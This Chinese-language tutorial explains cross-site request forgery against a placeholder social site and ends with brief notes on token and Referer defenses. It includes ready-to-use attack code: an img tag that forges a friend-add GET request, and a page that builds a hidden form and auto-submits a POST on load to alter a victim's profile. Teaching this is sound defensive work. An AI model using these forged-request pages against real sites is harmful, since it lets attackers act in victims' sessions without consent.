CSRF(Cross-site request forgery):中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF;
概述
CSRF攻击涉及用户受害者、受信任的网站和恶意网站。当受害者与受信任的站点拥有一个活跃的会话的同时,如果访问恶意网站,恶意网站会注入一个HTTP请求到受信任的站点,从而破话用户的信息。
CSRF 攻击总是涉及到三个角色:信赖的网站(Collabtive)、受害者的 session 或 cookie 以及一个恶意网站。受害者会同时访问恶意网站与受信任的站点会话的时候。攻击包括一系列步骤,如下:
1.受害者用户使用他/她的用户名和密码登录到可信站点,从而创建一个新的会话。
2.受信任站点存储受害者会话的 cookie 或 session 在受害者用户的 web 浏览器端。
3.受害者用户在不退出信任网站时就去访问恶意网站。
4.恶意网站的网页发送一个请求到受害者的受信任的站点用户的浏览器。
5.web 浏览器将自动连接会话 cookie,因为它是恶意的要求针对可信站点。
6.受信任的站点如果受到 CSRF 攻击,攻击者的一些恶意的请求会被攻击者发送给信任站点。
恶意网站可以建立HTTP GET或POST请求到受信任的站点。一些HTML标签,比如img iframe,框架,形式没有限制的URL,可以在他们的使用属性中。img,iframe,框架可用于构造GET请求。HTML表单标签可用于构造POST请求。构造GET请求是相对容易的,因为它甚至不需要JavaScript的帮助;构造POST请求需要JavaScript。因为Collabtive只针对后者,本文章的内容将只涉及HTTP POST请求。
例子1:
有两个用户,Alice与Boby。Boby想与Alice成为好友,但是Alice拒绝添加Boby;这时Boby需要发送一个URL给Alice,当Alice访问这个URL后,Boby就自动添加到好友列表中(注意Alice不用点击任何东西,只要访问URL就自动添加好友)。
先我们要知道如何添加好友:
比如一个没有任何防御机制的GET请求如下:
http://mmc.com/action/friends/add?friend=40&__elgg_ts=15248176
在实际交互的中,如果两个用户互相添加,则彼此成为好友,所以这里写一段代码,写入自己的id,写成一个url给Alicec,当Alicec点击打开时会向服务器发送了一个add get请求,代码如下:
//根据你实际的id 填写
<html>
<img src="http://mmc.com/action/friends/add?friend=44&__elgg_ts=15248176">
</html>
例子2:
Alice用户有一个自己的描述,她希望Boby也编辑自己的描述,但是Boby用户拒绝了,这时Alice想通过发送一个 url 让Boby用户访问后,让Boby自动添加自己的描述。
首先我们需要知道编辑自己的描述需要的请求,使用抓包工具抓取所需要的参数:
当然这里的例子都是那些没有做防御机制的应用,只是为了介绍scrf
//如果一个post 的请求http://mmc.com/action/friends/set
//所传入的参数如下:
{
uid:1,
name:'磨磨虫',
age:23,
site:'深圳',
...
}
通过分析我们可以得知编辑用户需要的请求,其中最重要的就是uid,于是可以发送如下代码给Boby,
如何得到Boby的uid,例子一可以抓包得到,这个相信大家都明白了。
<html><body><h1>
This page forges an HTTP POST request.
</h1>
<script type="text/javascript">
function post(url,fields)
{
//create a <form> element.
var p = document.createElement("form");
//construct the form
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
//append the form to the current page.
document.body.appendChild(p);
//submit the form
p.submit();
}
function csrf_hack()
{
var fields;
// The following are form entries that need to be filled out
// by attackers. The entries are made hidden, so the victim
// won't be able to see them.
fields += "<input type='hidden' name='name' value='Boby'>";
fields += "<input type='hidden' name='site' value='长沙'>";
fields += "<input type='hidden' name='age' value='24'>";
fields += "<input type='hidden' name='uid' value='40'>";
var url = "http://mmc.com/action/friends/set";
post(url,fields);
}
// invoke csrf_hack() after the page is loaded.
window.onload = function() { csrf_hack();}
</script>
</body></html>
这个时候Boby打开Alice的链接,就会发送Post请求去修改自己的信息。
那又如何去防止csrf攻击呢?
针对CSRF的防御并不难,这里有几个常见的方法:
加密令牌:web应用程序可以在网页中嵌入一个加密的令牌,所有的请求都包含这个加密令牌,由于跨站请求无法获取这个令牌,所以伪造的请求很容易就被服务器识别;
Referer头途径:使用web应用程序也可以验证请求来源页面的Referer,然后由于隐私考虑,这个referer经常被客户端过滤;
防止csrf攻击的具体内容可以自行去研究一下,虽用过Node 写过加密令牌,但深知自身涉后端不深,如果有兴趣可以看一下阮一峰jwt.